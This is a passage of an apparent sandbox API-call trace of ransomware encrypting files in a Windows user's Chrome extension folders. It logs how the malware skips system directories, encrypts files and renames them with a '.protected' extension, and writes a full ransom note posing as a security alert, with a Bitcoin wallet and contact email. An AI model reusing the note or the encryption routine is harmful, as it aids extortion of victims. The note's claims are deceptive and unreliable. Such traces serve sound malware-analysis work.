pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\RESTORE_FILES.txt") returned 160 [0079.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.405] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.405] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.406] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.406] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.406] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.406] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.407] CloseHandle (hObject=0x164) returned 1 [0079.407] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.407] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0079.407] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0079.407] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0079.407] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0079.407] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0079.407] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv") returned 142 [0079.407] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0079.407] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0079.407] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\*") returned 144 [0079.407] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.407] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.407] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.407] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.407] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.407] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.407] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\.") returned 144 [0079.407] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.407] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.407] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.407] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.407] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.408] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.408] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.408] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\..") returned 145 [0079.408] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.408] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.408] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.408] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.408] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.408] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.408] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.408] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.408] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json") returned 156 [0079.408] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.408] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.408] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.408] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.408] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json") returned 156 [0079.408] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.408] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json") returned 156 [0079.408] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json") returned 156 [0079.409] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.409] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x102, lpOverlapped=0x0) returned 1 [0079.409] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.410] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x102, lpOverlapped=0x0) returned 1 [0079.410] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.410] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.410] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.410] CloseHandle (hObject=0x168) returned 1 [0079.410] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.protected") returned 166 [0079.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.protected")) returned 1 [0079.411] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.411] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.411] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\RESTORE_FILES.txt") returned 160 [0079.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.411] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.411] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.412] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.412] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.412] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.412] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.413] CloseHandle (hObject=0x164) returned 1 [0079.413] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.413] lstrcmpiW (lpString1="ms", lpString2="Windows") returned -1 [0079.413] lstrcmpiW (lpString1="ms", lpString2="Program Files") returned -1 [0079.413] lstrcmpiW (lpString1="ms", lpString2="Program Files (x86)") returned -1 [0079.413] lstrcmpiW (lpString1="ms", lpString2="$Recycle.bin") returned 1 [0079.413] lstrcmpiW (lpString1="ms", lpString2="System Volume Information") returned -1 [0079.413] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms") returned 142 [0079.413] lstrcmpW (lpString1="ms", lpString2=".") returned 1 [0079.413] lstrcmpW (lpString1="ms", lpString2="..") returned 1 [0079.413] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\*") returned 144 [0079.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.413] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.413] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.413] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.413] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.413] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.413] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\.") returned 144 [0079.413] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.413] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.413] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.413] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.414] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.414] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.414] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.414] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\..") returned 145 [0079.414] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.414] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.414] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.414] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.414] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.414] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.414] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.414] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.414] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json") returned 156 [0079.414] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.414] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.414] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.414] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json") returned 156 [0079.415] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json") returned 156 [0079.415] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json") returned 156 [0079.415] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.415] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0079.416] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.416] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0079.416] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.416] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.416] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.417] CloseHandle (hObject=0x168) returned 1 [0079.417] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.protected") returned 166 [0079.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.protected")) returned 1 [0079.418] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.418] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.418] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\RESTORE_FILES.txt") returned 160 [0079.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 